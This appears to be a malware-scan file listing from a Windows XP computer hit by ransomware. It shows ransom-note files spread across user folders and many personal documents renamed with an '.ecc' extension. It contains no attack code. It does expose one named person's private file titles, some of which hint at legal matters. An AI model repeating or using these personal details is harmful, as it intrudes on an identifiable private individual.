2015-02-25 21:10 - 2015-03-01 19:47 - 00016726 _____ () C:\WINDOWS\msmqinst.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00014361 _____ () C:\WINDOWS\comsetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00011004 _____ () C:\WINDOWS\ntdtcsetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00008529 _____ () C:\WINDOWS\netfxocm.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00004083 _____ () C:\WINDOWS\MedCtrOC.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00001891 _____ () C:\WINDOWS\imsins.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00001555 _____ () C:\WINDOWS\tabletoc.log
2015-02-25 21:10 - 2015-03-01 19:46 - 00001891 _____ () C:\WINDOWS\imsins.BAK
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-02-24 22:20 - 2015-02-25 03:34 - 00000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-24 18:07 - 2015-02-24 18:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Skype
2015-02-24 17:55 - 2015-02-24 23:13 - 00090148 _____ () C:\WINDOWS\Minidump\Mini022415-01.dmp.ecc
2015-02-23 14:36 - 2015-02-24 22:49 - 00000196 ____H () C:\Documents and Settings\michelle coe\My Documents\~$ther relevant Information.docx.ecc
2015-02-23 14:33 - 2015-02-24 22:34 - 00000196 ____H () C:\Documents and Settings\michelle coe\Desktop\~$BC LOG.docx.ecc
2015-02-23 14:32 - 2015-02-24 22:48 - 00011956 _____ () C:\Documents and Settings\michelle coe\My Documents\Gather relevant Information.docx.ecc
2015-02-23 14:32 - 2015-02-23 14:32 - 00010164 ____H () C:\Documents and Settings\michelle coe\My Documents\~WRL0005.tmp
2015-02-23 12:13 - 2015-02-24 22:34 - 00012020 _____ () C:\Documents and Settings\michelle coe\Desktop\ABC LOG.docx.ecc
2015-02-23 12:13 - 2015-02-23 13:40 - 00011959 ____H () C:\Documents and Settings\michelle coe\Desktop\~WRL3581.tmp
2015-02-22 14:15 - 2015-02-22 14:17 - 00000000 ____D () C:\WINDOWS\system32\MpEngineStore
2015-02-22 12:19 - 2015-03-10 18:27 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-02-22 12:17 - 2015-02-22 12:17 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Steam
2015-02-22 12:15 - 2015-03-14 12:45 - 00001984 _____ () C:\WINDOWS\error.log
2015-02-22 12:14 - 2015-03-14 12:45 - 00000513 _____ () C:\WINDOWS\errord.log
2015-02-22 11:47 - 2015-02-22 11:47 - 00000535 _____ () C:\WINDOWS\wmsetup.log
2015-02-22 11:44 - 2015-03-14 12:44 - 00000962 _____ () C:\WINDOWS\setupact.log
2015-02-22 11:44 - 2015-02-22 11:44 - 00000000 _____ () C:\WINDOWS\setuperr.log
2015-02-22 11:43 - 2015-03-14 13:06 - 00059362 _____ () C:\WINDOWS\setupapi.log
2015-02-22 05:52 - 2015-03-14 12:48 - 00455357 _____ () C:\WINDOWS\WindowsUpdate.log
2015-02-21 18:18 - 2015-02-24 22:34 - 00076324 _____ () C:\Documents and Settings\michelle coe\Desktop\New Charmagne Westphal- Resume February  2015.doc.ecc
2015-02-21 17:42 - 2015-02-21 17:42 - 00000000 ____D () C:\Documents and Settings\michelle coe\My Documents\New Folder
2015-02-20 19:15 - 2015-03-01 15:14 - 00000000 ___HD () C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}
2015-02-20 17:15 - 2015-02-20 17:15 - 00008630 _____ () C:\HELP_DECRYPT.HTML
2015-02-20 17:15 - 2015-02-20 17:15 - 00004258 _____ () C:\HELP_DECRYPT.TXT
2015-02-20 17:15 - 2015-02-20 17:15 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:46 - 2015-02-20 15:46 - 00008630 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:46 - 2015-02-20 15:46 - 00004258 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:46 - 2015-02-20 15:46 - 00000292 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL
2015-02-20 15:37 - 2015-02-22 14:15 - 00000000 ____D () C:\WINDOWS\FrameworkUpdate
2015-02-20 15:37 - 2015-02-20 15:37 - 00000480 ____H () C:\Documents and Settings\michelle coe\Application Data\麽鎒駓覜
2015-02-19 22:27 - 2015-02-19 22:27 - 00202208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
2015-02-17 16:04 - 2015-02-17 16:04 - 01202848 _____ (Microsoft Corporation) C:\WINDOWS\system32\FM20.DLL
2015-02-16 08:49 - 2015-02-24 22:34 - 00121668 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-Charmagne Westphal 2015.doc.ecc
2015-02-16 08:47 - 2015-02-24 22:34 - 00050724 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-Charmagne Westphal 2015.docx.ecc
2015-02-16 05:46 - 2015-02-24 22:34 - 00050724 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (3).docx.ecc
2015-02-16 05:33 - 2015-02-24 22:34 - 00104260 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (2).doc.ecc
2015-02-16 05:31 - 2015-02-24 22:34 - 00042564 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (2).docx.ecc

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-14 13:07 - 2014-03-07 00:19 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2015-03-14 13:06 - 2014-09-11 10:10 - 00000398 _____ () C:\WINDOWS\Tasks\MsgUpdateCheck (de5e9f60-5adf-404f-9048-3ab8bfd91685).job
2015-03-14 13:01 - 2009-12-10 22:00 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-03-14 12:51 - 2011-02-18 16:03 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\MFAData
2015-03-14 12:51 - 2009-08-09 14:59 - 00846968 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-03-14 12:47 - 2015-02-02 17:15 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\ViberPC
2015-03-14 12:47 - 2015-02-02 17:05 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber
2015-03-14 12:47 - 2010-08-04 21:00 - 00131072 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-03-14 12:46 - 2014-09-11 10:10 - 00000476 _____ () C:\WINDOWS\Tasks\SDMsgUpdate (Local).job
2015-03-14 12:46 - 2014-09-11 10:10 - 00000468 _____ () C:\WINDOWS\Tasks\SDMsgUpdate (TE).job
2015-03-14 12:46 - 2014-03-31 13:15 - 00000236 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-03-14 12:46 - 2014-03-10 21:09 - 00000261 _____ () C:\WINDOWS\wiadebug.log
2015-03-14 12:46 - 2009-12-10 22:00 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-03-14 12:46 - 2009-08-09 21:42 - 00216218 _____ () C:\WINDOWS\system32\nvapps.xml
2015-03-14 12:46 - 2006-02-28 08:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2015-03-14 12:45 - 2014-03-10 21:09 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2015-03-14 12:45 - 2009-08-09 19:38 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-03-10 19:18 - 2014-03-10 21:08 - 00032510 _____ () C:\WINDOWS\SchedLgU.Txt
2015-03-10 19:18 - 2011-02-26 17:31 - 00001954 _____ () C:\WINDOWS\epplauncher.mif
2015-03-10 19:18 - 2009-08-09 19:39 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2015-03-10 18:28 - 2012-05-06 09:30 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2015-03-10 18:12 - 2009-08-10 00:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Microsoft Help
2015-03-10 18:11 - 2013-07-14 18:00 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-03-10 18:04 - 2009-08-09 20:17 - 119837696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-03-10 15:40 - 2014-09-20 15:40 - 00000302 _____ () C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job
2015-03-05 19:24 - 2010-04-27 20:13 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2015-03-05 18:48 - 2009-12-24 10:22 - 00000000 ____D () C:\Documents and Settings\Administrator\Desktop\Unused files
2015-03-03 17:12 - 2011-10-13 09:27 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Skype
2015-03-03 00:58 - 2014-03-07 00:19 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\temp
2015-03-02 15:54 - 2009-12-20 12:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Start Menu\Programs\Steam
2015-03-02 15:29 - 2009-08-09 19:23 - 00000000 ____D () C:\WINDOWS\system32\DirectX
2015-03-02 15:15 - 2009-09-06 12:10 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Activision
2015-03-01 19:49 - 2015-02-04 14:58 - 00002265 _____ () C:\Documents and Settings\All Users\Desktop\Skype.lnk
2015-03-01 19:49 - 2015-02-04 14:58 - 00000000 ___RD () C:\Program Files\Skype
2015-03-01 19:49 - 2015-02-04 14:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Skype
2015-03-01 19:49 - 2009-10-10 06:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2015-03-01 16:32 - 2014-09-20 15:40 - 00000000 ____D () C:\Program Files\MyPC Backup
2015-03-01 13:15 - 2009-08-09 19:22 - 00000000 ____D () C:\WINDOWS\system32\Restore
2015-02-26 20:29 - 2009-10-10 06:29 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\Skype
2015-02-26 19:29 - 2010-07-23 07:34 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2015-02-25 02:59 - 2009-08-09 14:47 - 00000000 ____D () C:\WINDOWS\system32\ias
2015-02-25 02:59 - 2009-02-12 22:20 - 00005652 _____ () C:\WINDOWS\system32\IE8Eula.rtf.ecc
2015-02-25 02:59 - 2006-02-28 08:00 - 00039828 _____ () C:\WINDOWS\system32\eula.txt.ecc
2015-02-25 02:59 - 2006-02-28 08:00 - 00000676 _____ () C:\WINDOWS\system32\Drivers\gmreadme.txt.ecc
2015-02-24 23:13 - 2011-01-25 17:41 - 00000000 ____D () C:\WINDOWS\Minidump
2015-02-24 23:13 - 2009-08-09 14:55 - 01089572 _____ () C:\WINDOWS\system32\config\software.sav.ecc
2015-02-24 23:13 - 2009-08-09 14:55 - 00917540 _____ () C:\WINDOWS\system32\config\system.sav.ecc
2015-02-24 23:13 - 2009-08-09 14:55 - 00094244 _____ () C:\WINDOWS\system32\config\default.sav.ecc
2015-02-24 23:12 - 2012-12-02 16:11 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2761226$
2015-02-24 23:12 - 2012-12-02 16:11 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2015-02-24 23:12 - 2012-06-13 18:13 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2707511$
2015-02-24 23:12 - 2012-06-13 18:01 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2709162$
2015-02-24 23:12 - 2012-06-12 19:45 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2685939$
2015-02-24 23:12 - 2012-06-04 18:00 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2718704$
2015-02-24 23:12 - 2012-05-11 09:03 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2686509$
2015-02-24 23:12 - 2012-05-11 09:02 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2015-02-24 23:12 - 2012-05-11 08:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2015-02-24 23:12 - 2010-02-11 16:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978262$
2015-02-24 23:12 - 2010-02-11 16:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971468$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978251$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978037$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB975713$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB975560$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978706$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB977914$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB977165$
2015-02-24 23:11 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\SearchProtect
2015-02-24 23:11 - 2014-09-20 15:41 - 00000000 ____D () C:\Program Files\Speed Test
2015-02-24 23:11 - 2014-03-09 15:22 - 00123780 _____ () C:\TDSSKiller.3.0.0.25_09.03.2014_15.22.41_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:21 - 00087236 _____ () C:\TDSSKiller.2.8.16.0_09.03.2014_15.21.44_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:21 - 00005076 _____ () C:\TDSSKiller.3.0.0.25_09.03.2014_15.21.06_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:20 - 00000676 _____ () C:\TDSSKiller.2.8.16.0_09.03.2014_15.20.24_log.txt.ecc
2015-02-24 23:11 - 2014-03-08 17:01 - 00000000 ____D () C:\VIPRERESCUE
2015-02-24 23:11 - 2011-02-26 17:54 - 00000000 ____D () C:\Qoobox
2015-02-24 23:11 - 2009-08-23 11:28 - 00000000 ____D () C:\Program Files\RealFlight Add-ons Volume 2
2015-02-24 23:11 - 2009-08-09 21:41 - 00000000 ____D () C:\Program Files\Windows Media Connect 2
2015-02-24 23:10 - 2014-10-15 12:57 - 00000000 ____D () C:\Program Files\EliteUnzip
2015-02-24 23:10 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\ffdshow
2015-02-24 23:10 - 2010-07-22 17:50 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2015-02-24 23:10 - 2009-10-09 18:00 - 00000000 ____D () C:\Program Files\Microsoft CAPICOM 2.1.0.2
2015-02-24 22:50 - 2014-01-26 13:44 - 00000000 ____D () C:\OETemp
2015-02-24 22:50 - 2012-01-28 17:09 - 00000000 ____D () C:\Malaysia photos
2015-02-24 22:49 - 2015-01-28 11:07 - 00010820 _____ () C:\Documents and Settings\michelle coe\My Documents\Personal Statement fos Scholarship 2015.docx.ecc
2015-02-24 22:49 - 2015-01-21 13:22 - 00025076 _____ () C:\Documents and Settings\michelle coe\My Documents\KWL%20Chart%20First%20Session%20Class%20Activity[1].docx.ecc
2015-02-24 22:49 - 2014-12-03 17:50 - 00013972 _____ () C:\Documents and Settings\michelle coe\My Documents\MARS PROJECT OVERVIEW.docx.ecc
2015-02-24 22:49 - 2014-11-12 18:27 - 00017908 _____ () C:\Documents and Settings\michelle coe\My Documents\LESSON PLAN FORMAT.docx.ecc
2015-02-24 22:49 - 2014-10-15 11:35 - 02713572 _____ () C:\Documents and Settings\michelle coe\My Documents\THE LIFECYCLE OF THE BUTTERFLY.pptx.ecc
2015-02-24 22:49 - 2014-10-09 09:55 - 00015092 _____ () C:\Documents and Settings\michelle coe\My Documents\Software Evaluation.docx.ecc
2015-02-24 22:49 - 2014-09-17 19:27 - 00011396 _____ () C:\Documents and Settings\michelle coe\My Documents\Kingsley.docx.ecc
2015-02-24 22:49 - 2014-09-17 19:25 - 00012692 _____ () C:\Documents and Settings\michelle coe\My Documents\PDF digital media.docx.ecc
2015-02-24 22:49 - 2014-07-29 07:09 - 00018820 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAPS incomplete.docx.ecc
2015-02-24 22:49 - 2014-07-28 17:52 - 00013268 _____ () C:\Documents and Settings\michelle coe\My Documents\Microboards.docx.ecc
2015-02-24 22:49 - 2014-07-27 10:47 - 00015172 _____ () C:\Documents and Settings\michelle coe\My Documents\WISD Reportl.docx.ecc
2015-02-24 22:49 - 2014-07-26 23:02 - 00019140 _____ () C:\Documents and Settings\michelle coe\My Documents\Skyline High School Map.docx.ecc
2015-02-24 22:49 - 2014-07-26 21:31 - 00012228 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAP.docx.ecc
2015-02-24 22:49 - 2014-07-26 17:28 - 00018692 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAPS.docx.ecc
2015-02-24 22:49 - 2014-07-19 14:48 - 00015812 _____ () C:\Documents and Settings\michelle coe\My Documents\Ruby Bridges Story.docx.ecc
2015-02-24 22:49 - 2014-07-17 10:27 - 00013364 _____ () C:\Documents and Settings\michelle coe\My Documents\Universal Design Article.docx.ecc
2015-02-24 22:49 - 2014-07-07 10:45 - 00014740 _____ () C:\Documents and Settings\michelle coe\My Documents\Peterson and Neuville ch 3.docx.ecc
2015-02-24 22:49 - 2014-07-01 12:09 - 00018612 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal.docx.ecc
2015-02-24 22:49 - 2014-06-29 22:54 - 00014148 _____ () C:\Documents and Settings\michelle coe\My Documents\websites for special education assignment.docx.ecc
2015-02-24 22:49 - 2014-03-09 00:10 - 00000000 ____D () C:\EEK
2015-02-24 22:48 - 2015-01-22 10:51 - 00013604 _____ () C:\Documents and Settings\michelle coe\My Documents\Assignment 1.docx.ecc
2015-02-24 22:48 - 2014-12-17 07:18 - 00013140 _____ () C:\Documents and Settings\michelle coe\My Documents\Court Date 2014.docx.ecc
2015-02-24 22:48 - 2014-12-07 18:52 - 00015380 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Writing analysis perceptual.docx.ecc
2015-02-24 22:48 - 2014-10-23 12:18 - 00012644 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal The seventh standard and related proficiencies.docx.ecc
2015-02-24 22:48 - 2014-10-21 10:03 - 00012548 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal reflection #5.docx.ecc
2015-02-24 22:48 - 2014-10-14 11:24 - 00014436 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Video 4.docx.ecc
2015-02-24 22:48 - 2014-10-11 15:08 - 00013652 _____ () C:\Documents and Settings\michelle coe\My Documents\Hypothesis Testing Sheet Charmagne Westphal.docx.ecc
2015-02-24 22:48 - 2014-10-07 13:03 - 00012868 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal video reflection #3.docx.ecc
2015-02-24 22:48 - 2014-09-30 10:48 - 00013588 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Video relection #2.docx.ecc
2015-02-24 22:48 - 2014-09-24 09:28 - 00012532 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal-Inspiration software.docx.ecc
2015-02-24 22:48 - 2014-09-23 09:52 - 00014004 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal-Video Reflection #1.docx.ecc
2015-02-24 22:48 - 2014-09-18 09:45 - 00015444 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Educational Technology.docx.ecc
2015-02-24 22:48 - 2014-09-11 21:11 - 00011636 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal desk top publishing.docx.ecc
2015-02-24 22:48 - 2014-09-10 14:39 - 00011860 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Creative Common.docx.ecc
2015-02-24 22:48 - 2014-09-10 13:57 - 00012260 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Web Browser assignment.docx.ecc
2015-02-24 22:48 - 2014-08-20 08:48 - 00011028 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Volunteer Services.docx.ecc
2015-02-24 22:48 - 2014-08-12 06:48 - 00018308 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal SED 5030 final Exam.docx.ecc
2015-02-24 22:48 - 2014-08-04 11:43 - 00013620 _____ () C:\Documents and Settings\michelle coe\My Documents\add ons for interrogatories.docx.ecc
2015-02-24 22:48 - 2014-08-03 16:39 - 00013364 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal journal 8.docx.ecc
2015-02-24 22:48 - 2014-08-02 11:50 - 00014868 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal interview with a parent.docx.ecc
2015-02-24 22:48 - 2014-08-02 11:15 - 00013428 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Interview with special education teacher.docx.ecc
2015-02-24 22:48 - 2014-08-02 09:41 - 00013684 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Ruby Bridges redo.docx.ecc
2015-02-24 22:48 - 2014-07-31 13:25 - 00012308 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Chapter article summary.docx.ecc
2015-02-24 22:48 - 2014-07-31 13:15 - 00012292 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Chapterarticle summary.docx.ecc
